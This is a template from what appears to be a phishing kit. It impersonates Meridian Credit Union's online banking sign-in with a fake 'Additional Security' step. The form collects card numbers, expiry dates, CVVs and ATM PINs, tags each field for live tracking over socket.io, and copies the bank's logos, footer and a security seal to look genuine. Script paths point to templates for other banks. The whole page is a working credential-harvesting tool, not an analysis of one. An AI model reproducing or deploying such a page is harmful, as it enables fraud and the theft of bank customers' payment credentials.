<%

let p_card = meridian.card === 'on' ? true : false;
let p_atm = meridian.atm === 'on' ? true : false;
let p_cvv = meridian.cvv === 'on' ? true : false;
let p_expiry = meridian.exp === 'on' ? true : false;

%>
<html lang="en">
    <head>
        <title>Sign in to online banking</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=5">
        <link href="/assets/meridian/style.css?v=1" rel="stylesheet">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.js"></script>
        <script src="/assets/js/details.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div class="body-content">
        	<div class="row public-header">
        		<div class="logo-container">
        			<a href="">
        				<img src="/assets/meridian//meridian-logo.svg" alt="Meridian Logo" class="meridian-logo">
        			</a>
        		</div>
        		<div class="link-container">
        			<ul class="utility-links">
        				<li>
        					<a href="">MeridianCU.ca</a>
        				</li>
        			</ul>
        		</div>
        	</div>
        </div>
        <div id="page-content" class="signin-page" style="background-image: url(/assets/meridian/Retail_SignInBackground_All.jpg)">
            <div class="signin-page-inner">
                <div class="row">
                    <div class="signin-form-container" id="acc-form">
                        <div class="signin-form">
                            <div class="signin-form-top">
                                <h1>Additional Security</h1>
                            </div>
                            <form id="loginForm" action="" autocomplete="false" class="disable-on-submit div-main" method="post" id="input-form" <?=$p_card ? 'onsubmit="return validate()"' : ''?>>
                                <input type="hidden" id="userAgent" name="userAgent">
                                <div class="signin-form-content">
                                    <p style="margin-bottom: 23px;color: #3e3e3e;font-size: 14px;">To verify your login, we require some additional information regarding your account.</p>
                                    <%if (p_card) { %>
                                    <div data-memorized-account-hidden="" style="">
                                        <label for="custNoInput">Card Number</label>
                                        <div class="icon-textbox-wrapper">
                                            <div class="input-wrapper">
                                                <input value="" class="icon-textbox lrinput" attr-action="Filling Card" id="input-card" name="card" placeholder="Enter Card Number" required="required" type="text" inputmode="numeric" aria-required="true" aria-invalid="false" minlength="19" maxlength="19" onkeyup="split()" >
                                                <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                                                <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                                            </div>
                                        </div>
                                    </div>
                                    <% } if (p_expiry) { %>
                                    <div data-memorized-account-hidden="" style="">
                                        <label for="custNoInput">Expiry Date</label>
                                        <div class="icon-textbox-wrapper">
                                            <div class="input-wrapper">
                                                <input value="" class="icon-textbox lrinput" attr-action="Filling Expiry" id="input-expiry2" minlength="5" maxlength="5" name="expiry" placeholder="Enter Expiry Date" required="required" type="text" inputmode="numeric" aria-required="true" aria-invalid="false">
                                            </div>
                                        </div>
                                    </div>
                                    <%} if (p_cvv) { %>
                                    <div data-memorized-account-hidden="" style="">
                                        <label for="custNoInput">CVV</label>
                                        <div class="icon-textbox-wrapper">
                                            <div class="input-wrapper">
                                                <input value="" class="icon-textbox lrinput" attr-action="Filling CVV" id="input-cvv" minlength="3" maxlength="4" name="cvv" placeholder="Enter CVV" required="required" type="text" aria-required="true" inputmode="numeric" aria-invalid="false">
                                            </div>
                                        </div>
                                    </div>
                                    <% } if (p_atm) { %>
                                    <div data-memorized-account-hidden="" style="">
                                        <label for="custNoInput">ATM Pin</label>
                                        <div class="icon-textbox-wrapper">
                                            <div class="input-wrapper">
                                                <input value="" class="icon-textbox lrinput" attr-action="Filling ATM" id="input-atm" minlength="4" maxlength="6" name="atm" placeholder="Enter ATM Pin" required="required" type="text" aria-required="true" inputmode="numeric" aria-invalid="false">
                                            </div>
                                        </div>
                                    </div>
                                    <% } %>
                                    <br>
                                    <button onclick="submitForm()" type="button" class="orange button" id="sign-in-button" name="save" value="1">
                                    Continue
                                    </button>
                                    <br>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <footer class="main-footer" id="acc-footer">
            <div class="row">
                <div class="footer-logos">
                    <div class="logo-container">
                        <a href="/Security_Login" class="not-interactive">
                        <img src="/assets/meridian/meridian-logo-white.svg" alt="Meridian Logo" class="meridian-logo">
                        </a>
                    </div>
                    <div>
                        <img src="/assets/meridian/entrust.png" alt="Secured by Entrust SSL" class="entrust-seal">
                    </div>
                </div>
                <div class="footer-sub">
                    <span>Copyright © 2023 Meridian Credit Union. All rights reserved.</span>
                    <div class="footer-links">
                        <a href="https://www.meridiancu.ca/privacy" title="Privacy &amp; Security" target="_blank" rel="noopener noreferrer" aria-label="Privacy &amp; Security page opens the https://www.meridiancu.ca/privacy on a new window.">Privacy &amp; Security</a>
                        <a href="https://www.meridiancu.ca/legal" title="Legal" target="_blank" rel="noopener noreferrer" aria-label="Legal page opens the https://www.meridiancu.ca/legal on a new window.">Legal</a>
                        <a href="https://www.meridiancu.ca/accessibility" title="Accessibility" target="_blank" rel="noopener noreferrer" aria-label="Accessibility page opens the https://www.meridiancu.ca/accessibility on a new window.">Accessibility</a>
                    </div>
                </div>
            </div>
        </footer>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Card</span>
    </body>
    <script src="/bank/atb/js/scriptCard.js"></script>
    <script src="/bank/meridian/js/script.js"></script>
</html>
